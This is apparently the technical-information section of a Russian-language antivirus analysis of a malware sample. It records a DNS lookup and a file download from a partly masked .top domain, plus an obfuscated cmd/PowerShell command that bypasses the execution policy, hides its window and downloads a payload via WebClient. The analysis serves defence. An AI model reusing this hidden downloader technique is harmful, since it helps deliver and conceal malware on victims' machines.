Техническая информация
- http://ho####wergop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^wEr^sH^elL.E^xE ^-exEcUtI^on^P^ol^ICy^ B^y^P^A^ss -n^Op^R^oF^IL^e ^-^W^IN^DOwStylE ^hi^Dden^ (ne^w-oBj^Ect^ s^YsT^eM.nEt.wEbc^l^i^ENT).do^WN^L^oA^Df^i^LE^(^'http://ho####w...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "PO^wEr^sH^elL.E^xE ^-exEcUtI^on^P^ol^ICy^ B^y^P^A^ss -n^Op^R^oF^IL^e ^-^W^IN^DOwStylE ^hi^Dden^ (ne^w-oBj^Ect^ s^YsT^eM.nEt.wEbc^l^i^ENT).do^WN^L^oA^Df^i^LE^(^'http://ho####w...' (со скрытым окном)